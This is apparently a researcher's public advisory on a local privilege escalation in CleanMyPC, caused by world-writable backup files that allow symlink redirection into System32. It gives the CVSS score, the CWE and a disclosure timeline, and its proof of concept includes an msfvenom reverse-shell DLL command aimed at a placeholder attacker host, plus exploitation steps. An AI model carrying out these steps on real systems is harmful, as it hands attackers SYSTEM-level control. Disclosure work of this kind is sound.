Local Privilege Escalation in CleanMyPC

2 min readNov 2, 2024

Vulnerability Summary

CleanMyPC generates multiple files in the C:\ProgramData\MawPaw Inc\CleanMyPC\Settings\Backup directory under the NT AUTHORITY\SYSTEM context. These files have overly permissive access, granting Full Control permissions to the Everyone group. As a result, even low-privileged users can delete these files and replace them with symbolic links pointing to protected directories, such as C:\Windows\System32. This symbolic link could be followed, resulting in the creation of files within C:\Windows\System32. Leveraging this behavior, an attacker could write a DLL to the C:\Windows\System32 directory, ultimately achieving code execution as the SYSTEM user.

Product Home Page

Best PC cleaning software: CleanMyPC.

Do you want a clean and fast PC like on the first day? CleanMy® PC uninstalls programs and repairs the registry to make…

macpaw.com

CVSSv3.1 Score

7.8 — CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-59: Improper Link Resolution Before File Access (‘Link Following’)

Version Affected

CleanMyPC versions up to and including 1.12.2.2178, the latest version as of November 1, 2024.

Proof of Concept

Generate a reverse shell DLL payload using msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=[attacker_ip] LPORT=[attacker_port] -f dll -o ualapi.dll
Delete files within the C:\ProgramData\MawPaw Inc\CleanMyPC\Settings\Backup
Use the CreateSymlink.exe tool from Google Project Zero’s SymbolicLink-Testing-Tools to create a symbolic link at C:\ProgramData\MawPaw Inc\CleanMyPC\Settings\Backup\Settings.dat.0.bak that points to C:\Windows\System32\ualapi.dll.
Wait a few seconds for the redirection to complete successfully.
Once the redirection is successful, replace the ualapi.dll with your payload DLL.
Reboot the system, and you should receive a reverse shell with SYSTEM-level privileges.

PoC Video

Timeline

15–08–2024 — Vulnerability discovered and disclosed the details to the Macpaw security team

12–09–2024 — The security team acknowledged the vulnerability disclosure.

23–09–2024 — The security team requested for additional details of the vulnerability

26–09–2024 — More details for reproducing the vulnerability was sent.

31–10–2024 — Followed up on the update.

1–11–2024 —The security team responded that CleanMyPC was no longer actively developed and that only critical issues would be addressed. Since they did not consider this issue critical, they decided to postpone the fix.

2–11–2024 — Public Disclosure